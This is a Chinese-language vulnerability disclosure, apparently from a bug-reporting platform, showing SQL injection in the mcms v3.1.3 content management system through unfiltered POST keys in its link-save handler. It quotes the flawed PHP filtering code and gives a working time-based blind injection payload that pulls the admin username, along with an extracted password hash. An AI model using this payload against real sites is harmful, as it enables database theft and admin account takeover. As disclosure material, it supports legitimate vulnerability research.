mcms最新版SQL注入6枚打包（可出任意数据）

### 简要描述： mcms最新版SQL注入6枚打包（可出任意数据） ### 详细说明： 掌易科技的程序员反应相当快啊，确认漏洞当天就修复以后出新版本了，前面在wooyun提的几个漏洞新版的mcms做了相应的处理，发布了新版v_3.1.3.enterprise，再来研究研究。 注入一枚：/app/public/flink.php?m=save&ajax=1 post中有6个参数，虽然都经过了xss和sql的过滤，但是过滤的并不完全，我们看看是如何注入的。这里以forder为例进行说明（虽然下面的代码中，forder被intval了，但是不影响注入啊，慢慢看下去吧）。 ``` function m__save() { global $dbm; $_POST = H::sqlxss($_POST); $_GET = H::sqlxss($_GET); $_POST['fscope'] = $_POST['fscope'] == '首页' ? 0 : ($_POST['fscope'] == '全站'?-1:$_POST['fscope']); $_POST['fscope'] = intval($_POST['fscope']); $_POST['forder'] = intval($_POST['forder']); if($_POST['ftitle'] == '') die('{"code":"1","msg":"请填写链接名称","id":"ftitle"}'); if (verify::verify_url($_POST['furl'])) die('{"code":"1","msg":"链接地址不规范，如以http://开头，.com结尾","id":"furl"}'); unset($_POST['fgroup_2']); unset($_POST['fscope_2']); $rs = $dbm->single_insert(TB_PRE."flink",$_POST); if($rs['error'] == '') die('{"code":"0","msg":"添加成功"}'); die('{"code":"1","msg":"添加失败"}'); } ``` POST和GET的内容经过了过滤，去看看sqlxss()是怎么实现的 ``` public static function sqlxss($input){ if(is_array($input)){ foreach($input as $k=>$v){ $input[$k]=H::sqlxss($v); } }else{ $input=H::escape($input,1); $input=htmlspecialchars($input,ENT_QUOTES); } return $input; } ``` 对用户输入的内容先用H::escape过滤，再用htmlspecialchars过滤，我们再去看看H::escape ``` public static function escape($input, $urldecode = 0) { if(is_array($input)){ foreach($input as $k=>$v){ $input[$k]=H::escape($v,$urldecode); } }else{ $input=trim($input); if ($urldecode == 1) { $input=str_replace(array('+'),array('{addplus}'),$input); $input = urldecode($input); $input=str_replace(array('{addplus}'),array('+'),$input); } // PHP版本大于5.4.0，直接转义字符 if (strnatcasecmp(PHP_VERSION, '5.4.0') >= 0) { $input = addslashes($input); } else { // 魔法转义没开启，自动加反斜杠 if (!get_magic_quotes_gpc()) { $input = addslashes($input); } } } //防止最后一个反斜杠引起SQL错误如 'abc\' if(substr($input,-1,1)=='\\') $input=$input."'";//$input=substr($input,0,strlen($input)-1); return $input; } ``` 对用户的输入过滤的还是很彻底的，但是这里忽略了一点，那就是没有对KEY进行过滤，造成了注入。 在上面第一段代码中，有这么一句$rs = $dbm->single_insert(TB_PRE."flink",$_POST); 直接把POST的内容作为数组代入了insert函数，因此，POST中上key就作为数据库的key代入执行了SQL。 Payload:POST提交 ``` forder`)value(''/**/or/**/(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))/**/or'')#=forder=100&fgroup=%25E5%258F%258B%25E6%2583%2585%25E9%2593%25BE%25E6%258E%25A5&fgroup_2=%25E5%258F%258B%25E6%2583%2585%25E9%2593%25BE%25E6%258E%25A5&ftitle=test&furl=http%253A%252F%252Ftest.com&fimg=&fscope=%25E9%25A6%2596%25E9%25A1%25B5&fscope_2=%25E9%25A6%2596%25E9%25A1%25B5 ``` 因为是time-based blind 注入，猜测管理员用户名的第一个字母时，若错误，延迟2s左右，如下图 [<img src="https://images.seebug.org/upload/201504/1323485445d32a48d9b211bc22ee6e54c8702f45.jpg" alt="错误副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1323485445d32a48d9b211bc22ee6e54c8702f45.jpg) 若正确，延迟3s左右，如下图 [<img src="https://images.seebug.org/upload/201504/13234903df5e23017a7a754761e35511c27a59a4.jpg" alt="成功副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/13234903df5e23017a7a754761e35511c27a59a4.jpg) 按上面的方法依次做下去（burp intruder或者自己写个脚本跑），可测试管理员用户名为：mcmsadmin，密码为： f6fdffe48c908deb0f4c3bd36c032e72 ### 漏洞证明： 见 详细说明